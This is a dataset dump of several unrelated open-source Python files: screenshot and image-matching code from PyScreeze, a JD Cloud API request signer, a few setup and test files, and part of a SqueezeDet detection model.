matches = numpy.unravel_index(match_indices[:limit], result.shape)
if len(matches[0]) == 0:
if USE_IMAGE_NOT_FOUND_EXCEPTION:
raise ImageNotFoundException('Could not locate the image (highest confidence = %.3f)' % result.max())
else:
return
# use a generator for API consistency:
matchx = matches[1] * step + region[0] # vectorized
matchy = matches[0] * step + region[1]
for x, y in zip(matchx, matchy):
yield Box(x, y, needleWidth, needleHeight)
# TODO - We should consider renaming _locateAll_python to _locateAll_pillow, since Pillow is the real dependency.
@requiresPillow
def _locateAll_python(needleImage, haystackImage, grayscale=None, limit=None, region=None, step=1):
"""
TODO
"""
# setup all the arguments
if grayscale is None:
grayscale = GRAYSCALE_DEFAULT
needleFileObj = None
if isinstance(needleImage, (str, unicode)):
# 'image' is a filename, load the Image object
needleFileObj = open(needleImage, 'rb')
needleImage = Image.open(needleFileObj)
haystackFileObj = None
if isinstance(haystackImage, (str, unicode)):
# 'image' is a filename, load the Image object
haystackFileObj = open(haystackImage, 'rb')
haystackImage = Image.open(haystackFileObj)
if region is not None:
haystackImage = haystackImage.crop((region[0], region[1], region[0] + region[2], region[1] + region[3]))
else:
region = (0, 0) # set to 0 because the code always accounts for a region
if grayscale: # if grayscale mode is on, convert the needle and haystack images to grayscale
needleImage = ImageOps.grayscale(needleImage)
haystackImage = ImageOps.grayscale(haystackImage)
else:
# if not using grayscale, make sure we are comparing RGB images, not RGBA images.
if needleImage.mode == 'RGBA':
needleImage = needleImage.convert('RGB')
if haystackImage.mode == 'RGBA':
haystackImage = haystackImage.convert('RGB')
# setup some constants we'll be using in this function
needleWidth, needleHeight = needleImage.size
haystackWidth, haystackHeight = haystackImage.size
needleImageData = tuple(needleImage.getdata())
haystackImageData = tuple(haystackImage.getdata())
needleImageRows = [needleImageData[y * needleWidth:(y+1) * needleWidth] for y in range(needleHeight)] # LEFT OFF - check this
needleImageFirstRow = needleImageRows[0]
assert len(needleImageFirstRow) == needleWidth, 'For some reason, the calculated width of first row of the needle image is not the same as the width of the image.'
assert [len(row) for row in needleImageRows] == [needleWidth] * needleHeight, 'For some reason, the needleImageRows aren\'t the same size as the original image.'
numMatchesFound = 0
# NOTE: After running tests/benchmarks.py on the following code, it seem that having a step
# value greater than 1 does not give *any* significant performance improvements.
# Since using a step higher than 1 makes for less accurate matches, it will be
# set to 1.
step = 1 # hard-code step as 1 until a way to improve it can be figured out.
if step == 1:
firstFindFunc = _kmp
else:
firstFindFunc = _steppingFind
for y in range(haystackHeight): # start at the leftmost column
for matchx in firstFindFunc(needleImageFirstRow, haystackImageData[y * haystackWidth:(y+1) * haystackWidth], step):
foundMatch = True
for searchy in range(1, needleHeight, step):
haystackStart = (searchy + y) * haystackWidth + matchx
if needleImageData[searchy * needleWidth:(searchy+1) * needleWidth] != haystackImageData[haystackStart:haystackStart + needleWidth]:
foundMatch = False
break
if foundMatch:
# Match found, report the x, y, width, height of where the matching region is in haystack.
numMatchesFound += 1
yield Box(matchx + region[0], y + region[1], needleWidth, needleHeight)
if limit is not None and numMatchesFound >= limit:
# Limit has been reached. Close file handles.
if needleFileObj is not None:
needleFileObj.close()
if haystackFileObj is not None:
haystackFileObj.close()
return
# There was no limit or the limit wasn't reached, but close the file handles anyway.
if needleFileObj is not None:
needleFileObj.close()
if haystackFileObj is not None:
haystackFileObj.close()
if numMatchesFound == 0:
if USE_IMAGE_NOT_FOUND_EXCEPTION:
raise ImageNotFoundException('Could not locate the image.')
else:
return
def locate(needleImage, haystackImage, **kwargs):
"""
TODO
"""
# Note: The gymnastics in this function is because we want to make sure to exhaust the iterator so that the needle and haystack files are closed in locateAll.
kwargs['limit'] = 1
points = tuple(locateAll(needleImage, haystackImage, **kwargs))
if len(points) > 0:
return points[0]
else:
if USE_IMAGE_NOT_FOUND_EXCEPTION:
raise ImageNotFoundException('Could not locate the image.')
else:
return None
def locateOnScreen(image, minSearchTime=0, **kwargs):
"""TODO - rewrite this
minSearchTime - amount of time in seconds to repeat taking
screenshots and trying to locate a match. The default of 0 performs
a single search.
"""
start = time.time()
while True:
try:
screenshotIm = screenshot(region=None) # the locateAll() function must handle cropping to return accurate coordinates, so don't pass a region here.
retVal = locate(image, screenshotIm, **kwargs)
try:
screenshotIm.fp.close()
except AttributeError:
# Screenshots on Windows won't have an fp since they came from
# ImageGrab, not a file. Screenshots on Linux will have fp set
# to None since the file has been unlinked
pass
if retVal or time.time() - start > minSearchTime:
return retVal
except ImageNotFoundException:
if time.time() - start > minSearchTime:
if USE_IMAGE_NOT_FOUND_EXCEPTION:
raise
else:
return None
def locateAllOnScreen(image, **kwargs):
"""
TODO
"""
# TODO - Should this raise an exception if zero instances of the image can be found on the screen, instead of always returning a generator?
screenshotIm = screenshot(region=None) # the locateAll() function must handle cropping to return accurate coordinates, so don't pass a region here.
retVal = locateAll(image, screenshotIm, **kwargs)
try:
screenshotIm.fp.close()
except AttributeError:
# Screenshots on Windows won't have an fp since they came from
# ImageGrab, not a file. Screenshots on Linux will have fp set
# to None since the file has been unlinked
pass
return retVal
def locateCenterOnScreen(image, **kwargs):
"""
TODO
"""
coords = locateOnScreen(image, **kwargs)
if coords is None:
return None
else:
return center(coords)
@requiresPillow
def showRegionOnScreen(region, outlineColor='red', filename='_showRegionOnScreen.png'):
"""
TODO
"""
# TODO - This function is useful! Document it!
screenshotIm = screenshot()
draw = ImageDraw.Draw(screenshotIm)
region = (region[0], region[1], region[2] + region[0], region[3] + region[1]) # convert from (left, top, right, bottom) to (left, top, width, height)
draw.rectangle(region, outline=outlineColor)
screenshotIm.save(filename)
@requiresPillow
def _screenshot_win32(imageFilename=None, region=None):
"""
TODO
"""
# TODO - Use the winapi to get a screenshot, and compare performance with ImageGrab.grab()
# https://stackoverflow.com/a/3586280/1893164
im = ImageGrab.grab()
if region is not None:
assert len(region) == 4, 'region argument must be a tuple of four ints'
region = [int(x) for x in region]
im = im.crop((region[0], region[1], region[2] + region[0], region[3] + region[1]))
if imageFilename is not None:
im.save(imageFilename)
return im
def _screenshot_osx(imageFilename=None, region=None):
"""
TODO
"""
# TODO - use tmp name for this file.
if imageFilename is None:
tmpFilename = 'screenshot%s.png' % (datetime.datetime.now().strftime('%Y-%m%d_%H-%M-%S-%f'))
else:
tmpFilename = imageFilename
subprocess.call(['screencapture', '-x', tmpFilename])
im = Image.open(tmpFilename)
if region is not None:
assert len(region) == 4, 'region argument must be a tuple of four ints'
region = [int(x) for x in region]
im = im.crop((region[0], region[1], region[2] + region[0], region[3] + region[1]))
os.unlink(tmpFilename) # delete image of entire screen to save cropped version
im.save(tmpFilename)
else:
# force loading before unlinking, Image.open() is lazy
im.load()
if imageFilename is None:
os.unlink(tmpFilename)
return im
def _screenshot_linux(imageFilename=None, region=None):
"""
TODO
"""
if not scrotExists:
raise NotImplementedError('"scrot" must be installed to use screenshot functions in Linux. Run: sudo apt-get install scrot')
if imageFilename is None:
tmpFilename = '.screenshot%s.png' % (datetime.datetime.now().strftime('%Y-%m%d_%H-%M-%S-%f'))
else:
tmpFilename = imageFilename
if scrotExists:
subprocess.call(['scrot', '-z', tmpFilename])
im = Image.open(tmpFilename)
if region is not None:
assert len(region) == 4, 'region argument must be a tuple of four ints'
region = [int(x) for x in region]
im = im.crop((region[0], region[1], region[2] + region[0], region[3] + region[1]))
os.unlink(tmpFilename) # delete image of entire screen to save cropped version
im.save(tmpFilename)
else:
# force loading before unlinking, Image.open() is lazy
im.load()
if imageFilename is None:
os.unlink(tmpFilename)
return im
else:
raise Exception('The scrot program must be installed to take a screenshot with PyScreeze on Linux. Run: sudo apt-get install scrot')
def _kmp(needle, haystack, _dummy): # Knuth-Morris-Pratt search algorithm implementation (to be used by screen capture)
"""
TODO
"""
# build table of shift amounts
shifts = [1] * (len(needle) + 1)
shift = 1
for pos in range(len(needle)):
while shift <= pos and needle[pos] != needle[pos-shift]:
shift += shifts[pos-shift]
shifts[pos+1] = shift
# do the actual search
startPos = 0
matchLen = 0
for c in haystack:
while matchLen == len(needle) or \
matchLen >= 0 and needle[matchLen] != c:
startPos += shifts[matchLen]
matchLen -= shifts[matchLen]
matchLen += 1
if matchLen == len(needle):
yield startPos
def _steppingFind(needle, haystack, step):
"""
TODO
"""
for startPos in range(0, len(haystack) - len(needle) + 1):
foundMatch = True
for pos in range(0, len(needle), step):
if haystack[startPos + pos] != needle[pos]:
foundMatch = False
break
if foundMatch:
yield startPos
def center(coords):
"""
Returns a `Point` object with the x and y set to an integer determined by the format of `coords`.
The `coords` argument is a 4-integer tuple of (left, top, width, height).
For example:
>>> center((10, 10, 6, 8))
Point(x=13, y=14)
>>> center((10, 10, 7, 9))
Point(x=13, y=14)
>>> center((10, 10, 8, 10))
Point(x=14, y=15)
"""
# TODO - one day, add code to handle a Box namedtuple.
return Point(coords[0] + int(coords[2] / 2), coords[1] + int(coords[3] / 2))
def pixelMatchesColor(x, y, expectedRGBColor, tolerance=0):
"""
TODO
"""
pix = pixel(x, y)
if len(pix) == 3 or len(expectedRGBColor) == 3: #RGB mode
r, g, b = pix[:3]
exR, exG, exB = expectedRGBColor[:3]
return (abs(r - exR) <= tolerance) and (abs(g - exG) <= tolerance) and (abs(b - exB) <= tolerance)
elif len(pix) == 4 and len(expectedRGBColor) == 4: #RGBA mode
r, g, b, a = pix
exR, exG, exB, exA = expectedRGBColor
return (abs(r - exR) <= tolerance) and (abs(g - exG) <= tolerance) and (abs(b - exB) <= tolerance) and (abs(a - exA) <= tolerance)
else:
assert False, 'Color mode was expected to be length 3 (RGB) or 4 (RGBA), but pixel is length %s and expectedRGBColor is length %s' % (len(pix), len(expectedRGBColor))
def pixel(x, y):
"""
TODO
"""
if sys.platform == 'win32':
# On Windows, calling GetDC() and GetPixel() is twice as fast as using our screenshot() function.
with __win32_openDC(0) as hdc: # handle will be released automatically
color = windll.gdi32.GetPixel(hdc, x, y)
if color < 0:
raise WindowsError("windll.gdi32.GetPixel failed : return {}".format(color))
# color is in the format 0xbbggrr https://msdn.microsoft.com/en-us/library/windows/desktop/dd183449(v=vs.85).aspx
bbggrr = "{:0>6x}".format(color) # bbggrr => 'bbggrr' (hex)
b, g, r = (int(bbggrr[i:i+2], 16) for i in range(0, 6, 2))
return (r, g, b)
else:
# Need to select only the first three values of the color in
# case the returned pixel has an alpha channel
return RGB(*(screenshot().getpixel((x, y))[:3]))
# set the screenshot() function based on the platform running this module
if sys.platform.startswith('java'):
raise NotImplementedError('Jython is not yet supported by PyScreeze.')
elif sys.platform == 'darwin':
screenshot = _screenshot_osx
elif sys.platform == 'win32':
screenshot = _screenshot_win32
else: # TODO - Make this more specific. "Anything else" does not necessarily mean "Linux".
screenshot = _screenshot_linux
grab = screenshot # for compatibility with Pillow/PIL's ImageGrab module.
# set the locateAll function to use opencv if possible; python 3 needs opencv 3.0+
# TODO - Should this raise an exception if zero instances of the image can be found on the screen, instead of always returning a generator?
if useOpenCV:
locateAll = _locateAll_opencv
if not RUNNING_PYTHON_2 and cv2.__version__ < '3':
locateAll = _locateAll_python
else:
locateAll = _locateAll_python
| 38.171849 | 174 | 0.648673 |
4fcf9bb01e0eb8a58b1e7521096ed04c70a219ff | 1,076 | py | Python | setup.py | DoctorJohn/eponym | dad6ebdf7f463d1ceee9c7804fb0c6b52d7a529a | [
"MIT"
] | 1 | 2019-11-19T21:06:43.000Z | 2019-11-19T21:06:43.000Z | setup.py | DoctorJohn/eponym | dad6ebdf7f463d1ceee9c7804fb0c6b52d7a529a | [
"MIT"
] | 1 | 2019-11-19T19:35:29.000Z | 2019-11-19T19:35:29.000Z | setup.py | DoctorJohn/eponym | dad6ebdf7f463d1ceee9c7804fb0c6b52d7a529a | [
"MIT"
] | null | null | null | import os
from setuptools import find_packages, setup
from eponym import __version__
with open(os.path.join(os.path.dirname(__file__), 'README.md')) as readme:
README = readme.read()
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='eponym',
version=__version__,
packages=find_packages(),
include_package_data=True,
license='MIT License',
description='Decent username generator based on handpicked wordlists',
long_description=README,
long_description_content_type='text/markdown',
url='https://github.com/DoctorJohn/eponym',
author='Jonathan Ehwald',
author_email='pypi@ehwald.info',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
)
| 30.742857 | 78 | 0.724907 |
2b06991a3be00249a7eb90ca63f5b5604ae67b14 | 6,185 | py | Python | jdcloud_sdk/core/signer.py | jdcloud-demo/jdcloud-sdk-python | fddc2af24031c597948b8b8091978ac7e01a2695 | [
"Apache-2.0"
] | null | null | null | jdcloud_sdk/core/signer.py | jdcloud-demo/jdcloud-sdk-python | fddc2af24031c597948b8b8091978ac7e01a2695 | [
"Apache-2.0"
] | null | null | null | jdcloud_sdk/core/signer.py | jdcloud-demo/jdcloud-sdk-python | fddc2af24031c597948b8b8091978ac7e01a2695 | [
"Apache-2.0"
] | null | null | null | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import time
import hashlib
import hmac
import re
import uuid
from . import const
from .logger import INFO
from .util import quote
class Signer(object):
ignored_headers = ['authorization', 'user-agent']
def __init__(self, logger):
self.__logger = logger
def sign(self, method, service, region, uri, headers, data, credential, security_token):
uri_dict = self.__url_path_to_dict(uri)
host = uri_dict['host']
port = uri_dict['port']
query = uri_dict['query']
canonical_uri = quote(uri_dict['path'])
if port and port not in ['80', '443']:
full_host = host + ':' + port
else:
full_host = host
now = self.__now()
jdcloud_date = now.strftime('%Y%m%dT%H%M%SZ')
datestamp = now.strftime('%Y%m%d') # Date w/o time, used in credential scope
nonce = str(uuid.uuid4())
headers[const.JDCLOUD_DATE] = jdcloud_date
headers[const.JDCLOUD_NONCE] = nonce
canonical_querystring = self.__normalize_query_string(query)
canonical_headers, signed_headers = self.__build_canonical_headers(headers, security_token, full_host)
payload_hash = self.__sha256_hash(data)
canonical_request = (method + '\n' +
canonical_uri + '\n' +
canonical_querystring + '\n' +
canonical_headers + '\n' +
signed_headers + '\n' +
payload_hash)
algorithm = const.JDCLOUD_ALGORITHM
credential_scope = (datestamp + '/' +
region + '/' +
service + '/' +
const.JDCLOUD_REQUEST)
string_to_sign = (algorithm + '\n' +
jdcloud_date + '\n' +
credential_scope + '\n' +
self.__sha256_hash(canonical_request))
self.__logger.log(INFO, '---canonical_request---\n' + canonical_request)
self.__logger.log(INFO, '----string_to_sign---\n' + string_to_sign)
signing_key = self.__get_signature_key(credential.secret_key, datestamp, region, service)
encoded = string_to_sign.encode('utf-8')
signature = hmac.new(signing_key, encoded, hashlib.sha256).hexdigest()
authorization_header = (
algorithm + ' ' +
'Credential=' + credential.access_key + '/' + credential_scope + ', ' +
'SignedHeaders=' + signed_headers + ', ' +
'Signature=' + signature
)
headers.update({
const.JDCLOUD_AUTH: authorization_header,
const.JDCLOUD_DATE: jdcloud_date,
const.JDCLOUD_CONTENT_SHA256: payload_hash,
const.JDCLOUD_ALGORITHM: const.JDCLOUD_ALGORITHM,
const.JDCLOUD_NONCE: nonce
})
if security_token:
headers.update({const.JDCLOUD_SECURITY_TOKEN: security_token})
def __normalize_query_string(self, query):
params = (list(map(str.strip, s.split("=")))
for s in query.split('&')
if len(s) > 0)
normalized = '&'.join('%s=%s' % (p[0], p[1] if len(p) > 1 else '')
for p in sorted(params))
return normalized
def __now(self):
return datetime.datetime.utcfromtimestamp(time.time())
def __url_path_to_dict(self, path):
"""http://stackoverflow.com/a/17892757/142207"""
pattern = (r'^'
r'((?P<schema>.+?)://)?'
r'((?P<user>.+?)(:(?P<password>.*?))?@)?'
r'(?P<host>.*?)'
r'(:(?P<port>\d+?))?'
r'(?P<path>/.*?)?'
r'(\?(?P<query>.*?))?'
r'$')
regex = re.compile(pattern)
match = regex.match(path)
group_dict = match.groupdict() if match is not None else None
if group_dict['path'] is None:
group_dict['path'] = '/'
if group_dict['query'] is None:
group_dict['query'] = ''
return group_dict
def __sign(self, key, msg):
return hmac.new(key, msg.encode('utf-8'), hashlib.sha256).digest()
def __get_signature_key(self, key, date_stamp, region_name, service_name):
k_date = self.__sign((const.JDCLOUD2 + key).encode('utf-8'), date_stamp)
k_region = self.__sign(k_date, region_name)
k_service = self.__sign(k_region, service_name)
k_signing = self.__sign(k_service, const.JDCLOUD_REQUEST)
return k_signing
def __sha256_hash(self, val):
return hashlib.sha256(val.encode('utf-8')).hexdigest()
def __build_canonical_headers(self, req_headers, security_token, full_host):
headers = ['host'] # add host header first
signed_values = {}
for key in req_headers.keys():
value = req_headers[key]
lower_key = key.lower()
if lower_key in Signer.ignored_headers:
continue
headers.append(lower_key)
signed_values[lower_key] = value
headers.sort()
signed_headers = ';'.join(headers)
canonical_values = []
for key in headers:
if key == 'host':
canonical_values.append('host:' + full_host)
else:
canonical_values.append(key + ':' + signed_values[key])
canonical_headers = '\n'.join(canonical_values) + '\n'
return canonical_headers, signed_headers
| 35.142045 | 110 | 0.575424 |
1a4f527e408506ad2bef95c1c008b12e97f72aa4 | 285 | py | Python | it168/it168/pipelines.py | ripples-alive/Crawler | 61f7c253deb196fddc254f9603706589af79ed3f | [
"MIT"
] | 1 | 2017-02-24T03:34:03.000Z | 2017-02-24T03:34:03.000Z | it168/it168/pipelines.py | JayvicWen/Crawler | 61f7c253deb196fddc254f9603706589af79ed3f | [
"MIT"
] | null | null | null | it168/it168/pipelines.py | JayvicWen/Crawler | 61f7c253deb196fddc254f9603706589af79ed3f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
class It168Pipeline(object):
def process_item(self, item, spider):
return item
| 23.75 | 65 | 0.708772 |
c92def7193a320a21f1cbe2239ba52cd86236901 | 601 | py | Python | stella_api/core/models/app.py | InterStella0/stella_api | 3ab33767de8fac4cec23db87900c8eea6905adcc | [
"MIT"
] | null | null | null | stella_api/core/models/app.py | InterStella0/stella_api | 3ab33767de8fac4cec23db87900c8eea6905adcc | [
"MIT"
] | null | null | null | stella_api/core/models/app.py | InterStella0/stella_api | 3ab33767de8fac4cec23db87900c8eea6905adcc | [
"MIT"
] | 1 | 2022-03-08T14:50:27.000Z | 2022-03-08T14:50:27.000Z | from __future__ import annotations
from typing import TYPE_CHECKING
from fastapi import FastAPI
from stella_api.core.utils.errors import FailureLoadVersion
if TYPE_CHECKING:
from stella_api.core.models import RouteBase
__all__ = ("StellaAPI",)
class StellaAPI(FastAPI):
def __init__(self) -> None:
super().__init__(title="Stella API")
def create_route(self, router: RouteBase) -> None:
try:
router.setup()
self.include_router(router.router, prefix=router.prefix)
except Exception:
raise FailureLoadVersion(router.prefix)
| 24.04 | 68 | 0.705491 |
f153ab57d43ae44c48f5e61396700dcb09e5342a | 1,363 | py | Python | s2e_env/commands/project_creation/__init__.py | lzto/s2e-env-1 | e7d26b9c5b0f0b203fb335de0a952e70440e7d0a | [
"BSD-3-Clause"
] | 55 | 2019-12-20T03:25:14.000Z | 2022-01-16T07:19:47.000Z | s2e_env/commands/project_creation/__init__.py | lzto/s2e-env-1 | e7d26b9c5b0f0b203fb335de0a952e70440e7d0a | [
"BSD-3-Clause"
] | 2 | 2020-11-02T08:01:00.000Z | 2022-03-27T02:59:18.000Z | s2e_env/commands/project_creation/__init__.py | lzto/s2e-env-1 | e7d26b9c5b0f0b203fb335de0a952e70440e7d0a | [
"BSD-3-Clause"
] | 11 | 2020-08-06T03:59:45.000Z | 2022-02-25T02:31:59.000Z | """
Copyright (c) 2017 Cyberhaven
Copyright (c) 2017 Dependable Systems Laboratory, EPFL
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from .abstract_project import AbstractProject
from .cgc_project import CGCProject
from .linux_project import LinuxProject
from .target import Target
from .windows_project import WindowsProject, WindowsDLLProject, \
WindowsDriverProject
| 43.967742 | 78 | 0.807043 |
cdbccb8f6348c1557ac207e7ad254dc7d3afc47b | 428 | py | Python | nuplan/database/utils/label/test/test_label.py | MCZhi/nuplan-devkit | 3c4f5b8dcd517b27cfd258915ca5fe5c54e3cb0c | [
"Apache-2.0"
] | null | null | null | nuplan/database/utils/label/test/test_label.py | MCZhi/nuplan-devkit | 3c4f5b8dcd517b27cfd258915ca5fe5c54e3cb0c | [
"Apache-2.0"
] | null | null | null | nuplan/database/utils/label/test/test_label.py | MCZhi/nuplan-devkit | 3c4f5b8dcd517b27cfd258915ca5fe5c54e3cb0c | [
"Apache-2.0"
] | null | null | null | import json
import unittest
from nuplan.database.utils.label.label import Label
class TestLabel(unittest.TestCase):
def test_serialize(self) -> None:
""" Tests a serialized label are still the same after serializing. """
label = Label('my_name', (1, 3, 4, 1))
self.assertEqual(label, Label.deserialize(json.loads(json.dumps(label.serialize()))))
if __name__ == '__main__':
unittest.main()
| 23.777778 | 93 | 0.686916 |
dba5ba1835c02ae65c97733030f3ccce9d5d4f46 | 747 | py | Python | tests/test_stats.py | LBJ-Wade/powerbox | 491047f2cac516dc800fc9a3ef052ced8d0805fe | [
"MIT"
] | null | null | null | tests/test_stats.py | LBJ-Wade/powerbox | 491047f2cac516dc800fc9a3ef052ced8d0805fe | [
"MIT"
] | null | null | null | tests/test_stats.py | LBJ-Wade/powerbox | 491047f2cac516dc800fc9a3ef052ced8d0805fe | [
"MIT"
] | null | null | null | import numpy as np
from scipy.ndimage import gaussian_filter
import os
import inspect
import sys
from nose.tools import nottest
LOCATION = "/".join(os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))).split("/")[:-1])
sys.path.insert(0, LOCATION)
from powerbox import PowerBox
@nottest # this is not passing to desired tolerance at this point... not sure if this is a problem. It's not systematic.
def test_resolution():
var = [0]*6
for i in range(6):
pb = PowerBox(64*2**i, dim=2, pk=lambda k: 1.0*k ** -2., boxlength=1.0, angular_freq=True)
var[i] = np.var(gaussian_filter(pb.delta_x(),sigma=2**i,mode='wrap'))
print(var/var[0])
assert np.allclose(var/var[0],1,atol=1e-2)
| 35.571429 | 137 | 0.680054 |
c7669aa0c36a21c08102c025455be69fef5029da | 27,165 | py | Python | squeezeDet/src/nn_skeleton.py | Walter1218/Self_Driving_Car_ND | 526a9583a2bc616cb19cdfc7921b5e1c0f9711bd | [
"MIT"
] | 2 | 2017-05-25T01:26:41.000Z | 2019-08-16T13:38:57.000Z | squeezeDet/src/nn_skeleton.py | Walter1218/Self_Driving_Car_ND | 526a9583a2bc616cb19cdfc7921b5e1c0f9711bd | [
"MIT"
] | null | null | null | squeezeDet/src/nn_skeleton.py | Walter1218/Self_Driving_Car_ND | 526a9583a2bc616cb19cdfc7921b5e1c0f9711bd | [
"MIT"
] | 1 | 2019-02-17T05:19:29.000Z | 2019-02-17T05:19:29.000Z | # Author: Bichen Wu (bichen@berkeley.edu) 08/25/2016
"""Neural network model base class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
from utils import util
from easydict import EasyDict as edict
import numpy as np
import tensorflow as tf
def _add_loss_summaries(total_loss):
"""Add summaries for losses
Generates loss summaries for visualizing the performance of the network.
Args:
total_loss: Total loss from loss().
"""
losses = tf.get_collection('losses')
# Attach a scalar summary to all individual losses and the total loss; do the
# same for the averaged version of the losses.
for l in losses + [total_loss]:
tf.summary.scalar(l.op.name, l)
def _variable_on_device(name, shape, initializer, trainable=True):
"""Helper to create a Variable.
Args:
name: name of the variable
shape: list of ints
initializer: initializer for Variable
Returns:
Variable Tensor
"""
# TODO(bichen): fix the hard-coded data type below
dtype = tf.float32
if not callable(initializer):
var = tf.get_variable(name, initializer=initializer, trainable=trainable)
else:
var = tf.get_variable(
name, shape, initializer=initializer, dtype=dtype, trainable=trainable)
return var
def _variable_with_weight_decay(name, shape, wd, initializer, trainable=True):
"""Helper to create an initialized Variable with weight decay.
Note that the Variable is initialized with a truncated normal distribution.
A weight decay is added only if one is specified.
Args:
name: name of the variable
shape: list of ints
wd: add L2Loss weight decay multiplied by this float. If None, weight
decay is not added for this Variable.
Returns:
Variable Tensor
"""
var = _variable_on_device(name, shape, initializer, trainable)
if wd is not None and trainable:
weight_decay = tf.multiply(tf.nn.l2_loss(var), wd, name='weight_loss')
tf.add_to_collection('losses', weight_decay)
return var
class ModelSkeleton:
"""Base class of NN detection models."""
def __init__(self, mc):
self.mc = mc
# image batch input
self.image_input = tf.placeholder(
tf.float32, [mc.BATCH_SIZE, mc.IMAGE_HEIGHT, mc.IMAGE_WIDTH, 3],
name='image_input'
)
# a scalar tensor in range (0, 1]. Usually set to 0.5 in training phase and
# 1.0 in evaluation phase
self.keep_prob = tf.placeholder(tf.float32, name='keep_prob')
# A tensor where an element is 1 if the corresponding box is "responsible"
# for detection an object and 0 otherwise.
self.input_mask = tf.placeholder(
tf.float32, [mc.BATCH_SIZE, mc.ANCHORS, 1], name='box_mask')
# Tensor used to represent bounding box deltas.
self.box_delta_input = tf.placeholder(
tf.float32, [mc.BATCH_SIZE, mc.ANCHORS, 4], name='box_delta_input')
# Tensor used to represent bounding box coordinates.
self.box_input = tf.placeholder(
tf.float32, [mc.BATCH_SIZE, mc.ANCHORS, 4], name='box_input')
# Tensor used to represent labels
self.labels = tf.placeholder(
tf.float32, [mc.BATCH_SIZE, mc.ANCHORS, mc.CLASSES], name='labels')
# Tensor representing the IOU between predicted bbox and gt bbox
self.ious = tf.Variable(
initial_value=np.zeros((mc.BATCH_SIZE, mc.ANCHORS)), trainable=False,
name='iou', dtype=tf.float32
)
# model parameters
self.model_params = []
# model size counter
self.model_size_counter = [] # array of tuple of layer name, parameter size
# flop counter
self.flop_counter = [] # array of tuple of layer name, flop number
# activation counter
self.activation_counter = [] # array of tuple of layer name, output activations
self.activation_counter.append(('input', mc.IMAGE_WIDTH*mc.IMAGE_HEIGHT*3))
def _add_forward_graph(self):
"""NN architecture specification."""
raise NotImplementedError
def _add_interpretation_graph(self):
"""Interpret NN output."""
mc = self.mc
with tf.variable_scope('interpret_output') as scope:
preds = self.preds
# probability
num_class_probs = mc.ANCHOR_PER_GRID*mc.CLASSES
self.pred_class_probs = tf.reshape(
tf.nn.softmax(
tf.reshape(
preds[:, :, :, :num_class_probs],
[-1, mc.CLASSES]
)
),
[mc.BATCH_SIZE, mc.ANCHORS, mc.CLASSES],
name='pred_class_probs'
)
# confidence
num_confidence_scores = mc.ANCHOR_PER_GRID+num_class_probs
self.pred_conf = tf.sigmoid(
tf.reshape(
preds[:, :, :, num_class_probs:num_confidence_scores],
[mc.BATCH_SIZE, mc.ANCHORS]
),
name='pred_confidence_score'
)
# bbox_delta
self.pred_box_delta = tf.reshape(
preds[:, :, :, num_confidence_scores:],
[mc.BATCH_SIZE, mc.ANCHORS, 4],
name='bbox_delta'
)
# number of object. Used to normalize bbox and classification loss
self.num_objects = tf.reduce_sum(self.input_mask, name='num_objects')
with tf.variable_scope('bbox') as scope:
with tf.variable_scope('stretching'):
delta_x, delta_y, delta_w, delta_h = tf.unstack(
self.pred_box_delta, axis=2)
anchor_x = mc.ANCHOR_BOX[:, 0]
anchor_y = mc.ANCHOR_BOX[:, 1]
anchor_w = mc.ANCHOR_BOX[:, 2]
anchor_h = mc.ANCHOR_BOX[:, 3]
box_center_x = tf.identity(
anchor_x + delta_x * anchor_w, name='bbox_cx')
box_center_y = tf.identity(
anchor_y + delta_y * anchor_h, name='bbox_cy')
box_width = tf.identity(
anchor_w * util.safe_exp(delta_w, mc.EXP_THRESH),
name='bbox_width')
box_height = tf.identity(
anchor_h * util.safe_exp(delta_h, mc.EXP_THRESH),
name='bbox_height')
self._activation_summary(delta_x, 'delta_x')
self._activation_summary(delta_y, 'delta_y')
self._activation_summary(delta_w, 'delta_w')
self._activation_summary(delta_h, 'delta_h')
self._activation_summary(box_center_x, 'bbox_cx')
self._activation_summary(box_center_y, 'bbox_cy')
self._activation_summary(box_width, 'bbox_width')
self._activation_summary(box_height, 'bbox_height')
with tf.variable_scope('trimming'):
xmins, ymins, xmaxs, ymaxs = util.bbox_transform(
[box_center_x, box_center_y, box_width, box_height])
# The max x position is mc.IMAGE_WIDTH - 1 since we use zero-based
# pixels. Same for y.
xmins = tf.minimum(
tf.maximum(0.0, xmins), mc.IMAGE_WIDTH-1.0, name='bbox_xmin')
self._activation_summary(xmins, 'box_xmin')
